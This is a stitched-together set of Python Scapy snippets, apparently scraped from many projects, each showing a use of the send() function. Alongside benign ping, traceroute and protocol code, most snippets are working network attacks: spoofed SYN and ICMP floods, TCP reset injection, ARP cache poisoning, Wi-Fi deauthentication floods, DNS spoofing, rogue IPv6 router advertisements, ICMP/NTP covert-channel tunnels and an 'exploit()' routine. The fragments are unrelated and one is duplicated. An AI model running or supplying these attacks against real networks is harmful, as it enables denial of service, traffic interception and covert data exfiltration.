def _send_reset(self, packet: Packet) -> None: source_ip = packet[IP].src source_port = packet[TCP].sport destination_ip = packet[IP].dst destination_port = packet[TCP].dport sequence_number = packet[TCP].seq acknowledge_number = packet[TCP].ack flags = packet[TCP].flags message = self._make_message(source_ip, source_port, destination_ip, destination_port, sequence_number, acknowledge_number, flags) logger.info(f'Captured message \n ------ \n {message} \n ------ ') if 'S' in flags: logger.warning('Packet has SYN flag, not sending RST') return jitter = random.randint(max(-self.sequence_jitter, -sequence_number), self.sequence_jitter) if jitter == 0: logger.info('This RST packet should close connection') reset_attack_sequence_number = acknowledge_number + jitter reset_packet = IP(src=destination_ip, dst=source_ip) / TCP( sport=destination_port, dport=source_port, flags='R', window=self.DefaultWindowSize, seq=reset_attack_sequence_number) send(reset_packet, verbose=0, iface=self.interface)
def send_probe_req(self, bssid, essid): """Send a probe request to the specified AP""" src = RandMAC() if self.mac is None else self.mac self.logger.info('[!] Sending Broadcast Probe Request: SRC=[%s] -> BSSID: %s ESSID: %s' % (src, bssid, essid)) param = Dot11ProbeReq() essid = Dot11Elt(ID='SSID', info=essid) rates = Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = Dot11Elt(ID='DSset', info='\x01') pkt = RadioTap() / Dot11(type=0, subtype=4, addr1='ff:ff:ff:ff:ff:ff', addr2=src, addr3='ff:ff:ff:ff:ff:ff') / param / essid / rates / dsset try: sendp(pkt, verbose=0) except: return print ("Probing network '%s (%s)'\n" % (bssid, essid)) try: # Build a probe request packet with a SSID and a WPS information element dst = mac2str(bssid) src = mac2str("ff:ff:ff:ff:ff:ff") packet = Dot11(addr1=dst, addr2=src, addr3=dst) / Dot11ProbeReq() packet = packet / Dot11Elt(ID=0, len=len(essid), info=essid) / Dot11Elt(ID=221, len=9, info="%s\x10\x4a\x00\x01\x10" % self.wps_parser.WPS_ID) # Send it! send(packet, verbose=0) # self.probedNets[bssid] = None except Exception, e: print 'Failure sending probe request to', essid, ':', e
def icmpv6_ra(ifname): # 提取本地MAC ll_mac = get_mac_address(ifname) # -----------IPv6头部------------ # Next Header: 0x3A (ICMPv6) # 原地址: Link Local address # 目的地址: FF02::1(所有节点) base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::1') # ----------ICMPv6头部---------- # ICMPv6 Type: 134 # ICMPv6 Code: 0 (RA) router_solicitation = ICMPv6ND_RA() # ----Source Link-Layer Address---- # 源地址: 路由器MAC地址,本次为欺骗,所以MAC地址是本地MAC地址 src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac) # 提供MTU mtu = ICMPv6NDOptMTU(mtu=1500) # 提供前缀 prefix = ICMPv6NDOptPrefixInfo(prefix='2001:2::', prefixlen=64) # 构建数据包 packet = base / router_solicitation / src_ll_addr / mtu / prefix # packet.show() # 一直发送,知道客户使用Ctrl + C终止 while True: try: time.sleep(1) send(packet, verbose=False) print('发送RA数据包') except KeyboardInterrupt: print('退出!')
def tcp_monitor_callback(pkt): global SEQ_NUM global TCPPORT global HOSTADDR global COUNT if(pkt.payload.payload.flags & 2 != 0): 'A syn + ack situation, for SYN + ACK' print("tcp incoming connection") ACK=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A",ack=pkt[TCP].seq + 1,seq=pkt[TCP].ack)/get send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/ACK) elif(pkt.payload.payload.flags & 8 !=0): 'accept push from server, 8 for PSH flag' print("tcp push connection from server") pushLen = pkt[IP].len - (pkt[IP].ihl * 4 + pkt[TCP].dataofs * 4) ACK1win0=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen - 1,seq=pkt[TCP].ack,window=0) send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACK1win0) ACK2win0=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack,window=0) send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACK2win0) sleep(0.01) ACKwin14600=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack,window=14600) send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACKwin14600) elif(pkt.payload.payload.flags & 1 !=0): 'accept fin from server' print ("tcp server fin connection") FIN=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="FA", ack=pkt[TCP].seq +1, seq = pkt[TCP].ack) send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/FIN)
def __send_unencrypted_ack(self): chlo = ACKPacket() conf.L3socket = L3RawSocket chlo.setfieldval( 'CID', string_to_ascii(SessionInstance.get_instance().connection_id)) chlo.setfieldval( "Packet Number", PacketNumberInstance.get_instance().get_next_packet_number()) # print("First Ack Packet Number {}".format(int(str(PacketNumberInstance.get_instance().highest_received_packet_number), 16))) chlo.setfieldval( 'Largest Acked', int( str(PacketNumberInstance.get_instance(). highest_received_packet_number), 16)) chlo.setfieldval( 'First Ack Block Length', int( str(PacketNumberInstance.get_instance(). highest_received_packet_number), 16)) associated_data = extract_from_packet(chlo, end=15) body = extract_from_packet(chlo, start=27) message_authentication_hash = FNV128A().generate_hash( associated_data, body, True) chlo.setfieldval('Message Authentication Hash', string_to_ascii(message_authentication_hash)) p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP( dport=6121, sport=61250) / chlo send(p)
def scapy_ping(self, ip: str) -> None: """ This function pings a host with Scapy. """ debug(f"Send ICMP packet for {ip!r}") send(IP(dst=ip, src=self.ip) / ICMP(), iface=self.iface, verbose=False)
def _dns_responder(self, pkt: IP): packet = Packet(pkt, self.domain) answer = None request_name = dnstypes[packet.question.qtype] if self.config["server"]["log"] == "*" or \ self.config["server"]["log"] == request_name: self.logger.info( "[DNS %s] Source %s:%i - on %s", request_name, packet.src, packet.sport, packet.qname, ) # reject every packet which isn't a DNS A/TXT query if packet.is_valid_dnsquery( "A", self.config["server"]["root"] if self.config else ""): answer = self._make_a(packet) elif packet.is_valid_dnsquery("TXT"): answer = self._make_txt(packet) if answer is not None: send(answer.packet, verbose=0, iface=self.interface)
def kill(self): self.killed = True # The sniff function will only terminate once it receives a packet, so send a meaningless packet to ensure it # terminates immediately. pkt = IP(dst=self.interface.get_active_hosts()[0].get_addr()) send(pkt, iface=self.interface.get_name(), verbose=False)
def listener(self, packet): ip = packet.getlayer(IP) udp = packet.getlayer(UDP) if hasattr(packet, 'qd') and packet.qd is not None: host = packet.qd.qname[:-1].decode("utf-8") if host is not None: if host in self.__dictDomains: resolvedIP = self.__dictDomains[host] print("[*] Spoofing DNS request. Now %s ip are %s !!!!" % (host, resolvedIP)) else: try: resolvedIP = socket.gethostbyname(host) except: try: resolvedIP = dns.resolver.resolve(host, 'A') except: resolvedIP = None # DNS response if resolvedIP is not None: #print("Resolved DNS request for %s to %s for %s" % (host, resolvedIP, ip.src)) send(self.generatePacket(packet, host, resolvedIP, ip, udp)) else: return
def udp_monitor_callback(pkt): inLayer3 = pkt.payload.payload.payload.payload.payload if (pkt.haslayer(IP) and inLayer3.dst == INNERIP): print("incoming IP packet matches", INNERIP) outLayer3 = pkt.payload udpLayer = pkt.payload.payload vxlanLayer = pkt.payload.payload.payload inLayer2 = pkt.payload.payload.payload.payload inLayer4 = pkt.payload.payload.payload.payload.payload.payload outerIP = IP(src=outLayer3.dst, dst=outLayer3.src) udpinfo = UDP(sport=SRCPORT, dport=UDPPORT) vxlan = VXLAN(flags=vxlanLayer.flags, vni=VNI) innerETH = Ether(dst=inLayer2.src, src=inLayer2.dst, type=0x800) innerIP = IP(src=inLayer3.dst, dst=inLayer3.src) innerICMP = ICMP(type=0, code=0, id=inLayer4.id, seq=inLayer4.seq) send(outerIP / udpinfo / vxlan / innerETH / innerIP / innerICMP / PAYLOAD) if (pkt.haslayer(ARP)): print("incoming ARP packet")
def main(): """ :return: void """ got_data = 0 ip_layer = IP(src=TUNNEL_SERVER_IP, dst=TUNNEL_CLIENT_IP) while True: print "===============================================================" pkt = sniff(filter="icmp", timeout=15, count=1) print "received packet ------------------------------------------" pkt[0].show() print "received packet ------------------------------------------" i = 0 tunneled_data = pkt[0][ICMP].load if tunneled_data[:9] == "#request:": i = pkt[0][ICMP].seq tunneled_data = "#answer: " + random_word() + str(i) got_data = 1 if got_data == 0: tunneled_data = "Couldn't get data" icmp = (ICMP(type=0, code=0, id=pkt[0][ICMP].id, seq=i, chksum=random.randrange(1, 65535, 1)) / tunneled_data) packet = ip_layer / icmp print "sent packet ------------------------------------------" packet.show() print "sent packet ------------------------------------------" send(packet) got_data = 0
def start_transmission(self, count): self.__sniffer.start() time.sleep(1) try: while count != 0: count -= 1 pkt = self.__generate_next_packet() pkt_sent_time = time.time() send(pkt, verbose=False) if time.time() - pkt_sent_time < 1: time.sleep(TIME_INTERVAL - time.time() + pkt_sent_time) if self.__last_received_sequence_number != self.__last_generated_sequence_number: print( f'<{self.__last_generated_sequence_number}, "Timed_Out">' ) self.__last_received_sequence_number += 1 except KeyboardInterrupt: print('\nPacket Transmission Terminated!') self.__sniffer.stop() packet_loss = round( ((self.__last_generated_sequence_number + 1 - self.__received_count) / (self.__last_generated_sequence_number + 1)) * 100, 2) print( f'Packet Loss: {packet_loss}% \t | Packets Sent : {self.__last_generated_sequence_number + 1} \t | Packets Received : {self.__received_count}' )
def sendACK(self, **kwargs): # {{{ """ send a ACK to the defined host """ self.info(msg='Send ACK to %s' % kwargs['host'], **kwargs) rq = self.ipRequest(**kwargs)/self.tcpRequest(flags="A", **kwargs) send(str(rq), verbose=0)
def spam_pings(self, timeout=100): '''The spammer function that sends the generated packets''' start_time = time.time() while time.time() - start_time < timeout: pkt = self.__generate_packet() print(pkt.summary()) send(pkt, verbose=False)
def ARPpoison(dstIP, interval=7): try: # Default gateway IP and MAC gwIP = CmnNet.getDefaultGatewayIP() gwMAC = CmnNet.getMACByIP(gwIP) # Local IP and MAC lclIP = CmnNet.getLocalDefaultIP() lclMAC = CmnNet.getLocalDefaultMAC() # Target IP and MAC if not CmnNet.isValidIP(dstIP): raise InvalidIPv4Exception(dstIP) dstMAC = CmnNet.getMACByIP(dstIP) arpA = ARP(op=2, psrc=dstIP, hwsrc=lclMAC, pdst=gwIP, hwdst=gwMac) arpB = ARP(op=2, psrc=gwIP, hwsrc=lclMAC, pdst=dstIP, hwdst=dstMac) except e: raise e while True: try: send(arpA, iface=programMgr.mainNICName) send(arpB, iface=programMgr.mainNICName) except KeyboardInterrupt: exit(0) except: raise NetworkException() time.sleep(interval)
def restore(target_ip, host_ip, verbose=True): target_mac = get_mac(target_ip) host_mac = get_mac(host_ip) pkt = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac) send(pkt, verbose=0, count=100) if verbose: print('[+] sent to {} : {} is-at {}'.format(target_ip, host_ip, host_mac))
def send_echo_multiprocess(addr, data, index, str_f, seq=0): """Send echo request and sniff the reply. Arguments: addr {str} -- target address data {str} -- payload index {int} -- number of currently handling IP prefix str_f {list(str)} -- a list to store log strings Keyword Arguments: seq {int} -- sequence number in the ping request (default: {0}) Returns: list -- list of packets received """ str_f.append('--> Sending Echo Request to IP #%d, Seq = %d' % (index, seq)) base = IPv6(dst=addr, plen=len(data) + 8) extension = ICMPv6EchoRequest(data=data, seq=seq) packet = base / extension send(packet, verbose=False) rcv = sniff(timeout=0.5, filter='src %s' % addr) res = [] for i in rcv: res.append(i.show(dump=True)) return res
def SYN_Flood(t_ip, t_port): print("Пакеты отправляются") global stop_thread stop_thread = True while stop_thread: global packets ip_p = IP() ip_p.src = randomIP() # записываем в поле ip источника случайный ip #ip_p.src = "8.8.8.8" ip_p.dst = t_ip # записываем ip сервера tcp_p = TCP() #tcp_p.sport = 234 tcp_p.sport = randint( 0, 6000) # записываем в поле port источника случайный port tcp_p.dport = t_port # записываем port сервер tcp_p.flags = "S" # устанавливаем флаг SYN tcp_p.seq = randint(0, 9000) # устанавливаем случайный порядковый номер ? tcp_p.window = randint(5000, 8191) # устанавливаем случайное окно ? send(ip_p / tcp_p, verbose=False) # отправляем пакет packets += 1 myapp.ui.packetsCount.setText(str(packets)) # print("Пакет {0} отправлен".format(i + 1)) packets = 0 myapp.ui.packetsCount.setText(str(packets))
def send_next_pck(self, ip_address, ntp_mode: NTPMode = NTPMode.CLIENT) -> Packet: """ Sends the next chunk of payload bits to the destination. :param ip_address: :param ntp_mode: the mode of the ntp package to send. :return: the bits just send. """ next_bits_to_send = self.send_session.secret_to_send.next_bits(self.payload_size) self.log.debug("Next payload bits to send: " + str(next_bits_to_send)) ntp_pck = CP1Package(ntp_pck=init_ntp_client_pck()) ntp_pck.add_payload(next_bits_to_send) ntp_pck_ntp = ntp_pck.ntp() ntp_pck_ntp.orig = None ntp_pck_ntp.recv = None ntp_pck_ntp.mode = 5 pck_to_send = IP(dst=ip_address) / UDP() / ntp_pck_ntp send(pck_to_send) self.log.debug("Payload package successfully send to " + str(ip_address)) if not self.send_session.secret_to_send.has_next_bits(): self.log.debug("Sending complete. Terminating sending session.") return pck_to_send
def get_data(pkt: IP): try: client_message = pkt[DNSQR].qname[:-1].decode('utf-8') add_new_client = False for client in clients: if client.receiver_socket[ 1] == -1 and client.sender_socket == address: add_new_client = True client.receiver_socket = (client.receiver_socket[0], int(client_message)) if not add_new_client: print( time.ctime(time.time()) + str(address) + " => " + str(client_message)) for client in clients: if client.sender_socket != address: try: if client.receiver_socket[1] != -1: p = IP(dst=client.receiver_socket[0]) / UDP(dport=client.receiver_socket[1]) \ / DNS(rd=1, qd=DNSQR(qname=client_message)) print(client.receiver_socket[1]) send(p, verbose=0) print("Message was sent to", client) except socket.error as err: print(err) except socket.error as err: print(err) clients_to_remove.append(address)
def tcp(self): ip = IP(dst=target) tcp = TCP(sport=RandShort(), dport=port, flags="S") raw = Raw(b"X" * 1024) p = ip / tcp / raw send(p, verbose=1, count=count) print('Done') prompt()
def http(self): ip = IP(dst=target) tcp = TCP(sport=RandShort(), dport=port, flags="A") get = "GET / HTTP/1.1\r\nHost: " + target p = ip / tcp / get send(p, verbose=1, count=count) print('Done') prompt()
def is_able_to_send_ip(): try: p = IP(dst='8.8.8.8') send(p, verbose=0) except PermissionError: return False return True
def synFlood(m_host, m_port): src_host = ['192.168.1.2', '129.12.12.132', '192.168.1.26'] index = random.randrange(0, stop=2) for port in range(1024, 65535): ip = IP(src=src_host[index], dst=m_host) tcp = TCP(sport=port, dport=m_port, flags="S") pkt = ip / tcp send(pkt)
def bcast_icmp(iface): """ Send broadcast IP4 ping """ global iface_bcast_addr if iface_bcast_addr is None: iface_bcast_addr = get_brdaddr(iface) send(IP(dst=iface_bcast_addr) / ICMP() / "whosthere")
def SEND(self): """Main state of sender. New packets are transmitted to the receiver as long as there is space in the window. """ if (self.retransmit_flag): self.retransmit_flag = False raise self.RETRANSMIT() # check if you still can send new packets to the receiver if len(self.buffer) < self.effective_window: try: # get next payload (automatically removes it from queue) payload = self.q.get(block=False) log.debug("Sending packet num: %s", self.current) # add the current segment to the buffer self.buffer[self.current] = payload log.debug("Current buffer size: %s. Current buffer keys: %s", len(self.buffer), list(self.buffer.keys())) ############################################################### # create a GBN header with the correct header field values # # send a packet to the receiver containing the created header # # and the corresponding payload # ############################################################### if (self.SACK == 0): header_GBN = GBN(type='data', len=len(payload), hlen=6, num=self.current, win=self.win) if (self.SACK == 1): header_GBN = GBN(type='data', options=1, len=len(payload), hlen=6, num=self.current, win=self.win) send( IP(src=self.sender, dst=self.receiver) / header_GBN / payload) # sequence number of next packet self.current = int((self.current + 1) % 2**self.n_bits) # back to the beginning of the state # (send next packet if possible) raise self.SEND() # no more payload pieces in the queue --> if all are acknowledged, # we can end the sender except que.Empty: if self.unack == self.current: raise self.END()
def run(self): while True: if self.flag: raise Exception('Stop sending deauth packet') for ap in self.AP_list: address = ap[0] deauth_ap = Dot11(addr1=self.client, addr2=address, addr3=address)/Dot11Deauth() print ls(deauth_ap) send(deauth_ap, inter=0, count=1)
def version_covert_channel(src: str, dst: str, numpackets=2): ip = IPv6() ip.version = 5 ip.src = src ip.dst = dst layer4 = ICMPv6EchoRequest() pkt = ip / layer4 pkt.show() send(pkt, count=numpackets)
def spoof_arp_cache(targetip, targetmac, sourceip): """ Spoofs ARP Cache of the target device @param targetip: IP address of target machine @param targetmac: MAC address of the target machine @param sourceip: IP address of source host """ spoofed = ARP(op=2, pdst=targetip, psrc=sourceip, hwdst=targetmac) send(spoofed, verbose=False)
def quick_confirm(self): filt = "icmp and dst host " + self.victim.get_addr() self.quick_confirm_bool = False send(self.ping_pkt, verbose=False) sniff(count=1, filter=filt, timeout=1, prn=self.set_confirm_bool(True)) self.success = self.quick_confirm_bool
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac, stop): """ invia false ARP reply """ print(" Started ARP poison [CTRL-C to stop]") while not stop.is_set(): # avvelena il target send(ARP(op=2, hwdst=gateway_mac, pdst=gateway_ip, psrc=target_ip)) # avvelena il gateway send(ARP(op=2, hwdst=target_mac, pdst=target_ip, psrc=gateway_ip)) stop.wait(random.randrange(10, 40)) print(" Stopped ARP poison")
def run(self): while True: if self.flag: raise Exception('Stop sending deauth packet') for ap in self.AP_list: address = ap[0] deauth_ap = Dot11(addr1=self.client, addr2=address, addr3=address) / Dot11Deauth() print ls(deauth_ap) send(deauth_ap, inter=0, count=1)
def icmp_flood(self): print('\n' + ' ' * 23 + 'ICMP Flooding on %s\n' % self.args.target_ip) t = threading.Thread(target=self.show_stats, daemon=True) t.start() packet = scapy.layers.inet.IP( dst=self.args.target_ip) / scapy.layers.inet.ICMP() packet_bytes = len(packet) while True: send(packet, verbose=False) self.packets = self.packets + 1 self.bytes = self.bytes + packet_bytes
def send_packet(self, ttl): unused_port = self.get_unused_port() with self.ttl_to_ports_lock: self.ttl_to_ports[ttl].append(unused_port) layer = self.create_payload(unused_port, self.dst_port) p = self.ip_fabric(self.dst_ip, ttl) / layer self.port_to_ttl_and_time[unused_port] = (ttl, time.time()) send(p, verbose=0)
def send_pkt(i, id_icmp): """ :param i: index of message :param id_icmp: if of icmp message :return: void """ tunneled_data = REQUEST + MSG + random_word() # fake checksum so that os will throw the packet on other side checksum = random.randrange(1, 65535, 1) # src address is known by server ip_layer = IP(src=TUNNEL_CLIENT_IP, dst=TUNNEL_SERVER_IP, chksum=checksum) icmp = (ICMP(type=8, code=0, seq=i, id=id_icmp) / tunneled_data) packet = ip_layer / icmp print "sent packet: " packet.show() send(packet)
def send_reset(original_packet): """ sends a reset message to both parties of a connection :param original_packet: the packet that the reset replies to :return: None """ dst_port = original_packet['TCP'].dport src_port = original_packet['TCP'].sport src_ip = original_packet['IP'].src dst_ip = original_packet['IP'].dst send(IP(src=dst_ip, dst=src_ip) / TCP(sport=dst_port, dport=src_port, flags=RST_FLAG, seq=original_packet['TCP'].ack), verbose=False) send(IP(src=src_ip, dst=dst_ip) / TCP(sport=src_port, dport=dst_port, flags=RST_FLAG, seq=original_packet['TCP'].seq), verbose=False)
def exploit(): """ Establish an HTTP conenction and send a malicious HTTP request. """ os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 172.16.1.1 -j DROP') src_port = random.randint(1024, 65535) ip_pkt = IP(src=src_ip, dst=dst_ip) tcp_pkt = TCP(dport=8080, sport=src_port, \ seq=random.randint(0, 100000), flags='S') syn_ack = sr1(ip_pkt / tcp_pkt) tcp_pkt = TCP(dport=8080, sport=src_port, \ seq=syn_ack[TCP].ack, ack=(syn_ack[TCP].seq + 1), flags='A') send(ip_pkt / tcp_pkt) http_msg = "GET /file.exe HTTP/1.1\r\nContent-Length: " \ + str(len(msg)) + "\r\n\r\n" + msg sr1(ip_pkt / tcp_pkt / http_msg, timeout=30) exit()
def handle_packet(pkt): """ Apply packet handling logic. :param pkt: Received packet from network. """ global id_counter scapy_packet = IP(pkt.get_payload()) if IP in scapy_packet: scapy_packet[IP].ttl = get_new_ttl(scapy_packet[IP].ttl) scapy_packet[IP].id = id_counter # Change IP ID as Virtual NAT on Windows Host would do. id_counter += 1 if TCP in scapy_packet and scapy_packet[TCP].flags & RST: scapy_packet[TCP].flags = 'FA' del scapy_packet[IP].chksum send(scapy_packet) print 'Drop Packet' pkt.drop() else: print 'Accept Packet' pkt.accept()
def run(self): while True: if self.flag: raise Exception('Stop sending deauth packet') for ap in self.AP_list: address = ap[0] deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=address, addr3=address)/Dot11Deauth() send(deauth_ap, inter=0, count=5) print ls(deauth_ap) if len(self.clients_APs) > 0: with self.lock: for x in self.clients_APs: client = x[0] ap = x[1] ch = x[2] deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth() deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth() send(deauth_pkt1, inter=0, count=1) send(deauth_pkt2, inter=0, count=1)
def send(self, p, dest_iface=None): send(p.data, iface = self.ifname)
ACKwin14600=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack,window=14600) send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACKwin14600) elif(pkt.payload.payload.flags & 1 !=0): 'accept fin from server' print ("tcp server fin connection") FIN=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="FA", ack=pkt[TCP].seq +1, seq = pkt[TCP].ack) send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/FIN) def dispatcher_callback(pkt): print "packet incoming" global HOSTADDR global TCPPORT if(pkt.haslayer(TCP) and (pkt[TCP].sport == TCPPORT)): tcp_monitor_callback(pkt) else: return if __name__ == '__main__': print "Simple scapy http client " scapy.all.conf.iface = "eth0" ip=IP(dst=HOSTADDR) SYN=ip/TCP(sport=SRCPORT, dport=80, flags="S", options=[('Timestamp',(0,0))]) #SYN=ip/TCP(sport=12340, dport=80, flags="S") # Send SYN and receive SYN,ACK print "\n[*] Sending our SYN packet" send(SYN) sniff(filter=("port %s") % (TCPPORT), prn=dispatcher_callback)
def tcp_monitor_callback(pkt): global SEQ_NUM global TCPPORT if(pkt.payload.payload.flags == 2): 'A syn situation, 2 for SYN' print("tcp incoming connection") ACK=TCP(sport=TCPPORT, dport=pkt.payload.payload.sport, flags="SA",ack=pkt.payload.payload.seq + 1,seq=0) send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/ACK) if(pkt.payload.payload.flags & 8 !=0): 'accept push from client, 8 for PSH flag' print("tcp push connection") pushLen = pkt[IP].len - (pkt[IP].ihl * 4 + pkt[TCP].dataofs * 4) fr8=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack)/get8 fr10=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack + len(get8))/get10 fr11=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack + len(get8) + len(get10))/get11 fr13=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack + len(get8) + len(get10) + len(get11))/get13 send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr8) send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr10) send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr11) send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr13) if(pkt.payload.payload.flags & 1 !=0): 'accept fin from cilent' print ("tcp fin connection") FIN=TCP(sport=TCPPORT, dport=pkt.payload.payload.sport, flags="FA", ack=pkt.payload.payload.seq +1, seq = pkt.payload.payload.ack) send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/FIN)
from scapy.layers.dot11 import Dot11, Dot11Deauth from scapy.packet import ls from scapy.sendrecv import send __author__ = 'daniel' deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2='00:66:4b:78:db:cc', addr3='00:66:4b:78:db:cc')/Dot11Deauth() while True: ls(deauth_ap) send(deauth_ap, inter=0, count=1)
def handle_packet(pkt): """ Apply packet handling logic. :param pkt: Received packet from network. """ scapy_packet = IP(pkt.get_payload()) src_ip = scapy_packet[IP].src # Check if ICMP request packet if (ICMP in scapy_packet and scapy_packet[ICMP].type == 8 and Raw in scapy_packet): # If new malware register it. if src_ip not in malwares: client_os = get_client_os_from_icmp_payload(scapy_packet) malwares[src_ip] = MalwareClient(src_ip, client_os, scapy_packet[IP].id, False) mal = malwares[src_ip] # Check if this is second ping if mal.is_seen_ping: # Check if malware runs inside VM by two pings IP IDs. if mal.is_vm_by_ip_id(scapy_packet[IP].id): response = "True" else: response = "False" # Update last received IP ID. mal.set_ip_id(scapy_packet[IP].id) mal.set_is_seen_ping(False) # Return answer to the malware. cmd = (IP(dst=scapy_packet[IP].src) / ICMP(type=0, code=0, id=scapy_packet[ICMP].id, seq=scapy_packet[ICMP].seq) / response) send(cmd) print 'Drop' pkt.drop() else: # Update last received IP ID. mal.set_ip_id(scapy_packet[IP].id) mal.set_is_seen_ping(True) # Drop first ping print 'Drop' pkt.drop() # Check if TCP SYN packet elif (TCP in scapy_packet and scapy_packet[TCP].flags & SYN and scapy_packet[TCP].dport == 80): next_ack = scapy_packet.seq + 1 init_seq = randint(0, 4294967295) syn_ack = IP(src=scapy_packet.dst, dst=scapy_packet.src) syn_ack /= TCP(sport=scapy_packet.dport, dport=scapy_packet.sport, flags="SA", seq=init_seq, ack=next_ack) send(syn_ack) print "Received SYN, answered with SYN/ACK" pkt.drop() # Check if HTTP GET Request. elif http_filter(scapy_packet): # If new malware register it. if src_ip not in malwares: user_agent = get_user_agent(scapy_packet[Raw].load) client_os = get_os_from_user_agent(user_agent) print client_os malwares[src_ip] = MalwareClient(src_ip, client_os, scapy_packet[IP].id, False) mal = malwares[src_ip] # Check if malware runs inside VM by packet TTL. if mal.is_vm_by_ttl(scapy_packet[IP].ttl): response = "True" else: response = "False" # Return an answer with FA packet. next_seq = scapy_packet[TCP].ack next_ack = calc_next_ack(scapy_packet) res_pkt = IP(src=scapy_packet.dst, dst=scapy_packet.src) res_pkt /= TCP(sport=scapy_packet.dport, dport=scapy_packet.sport, flags="FPA", seq=next_seq, ack=next_ack) res_pkt /= 'HTTP/1.1 403 Forbidden\r\n' \ 'Connection: close\r\n'\ 'Content-Type: text/html;charset=iso-8859-1\r\n\r\n%s' \ % response send(res_pkt) pkt.drop() else: print 'Accept' pkt.accept()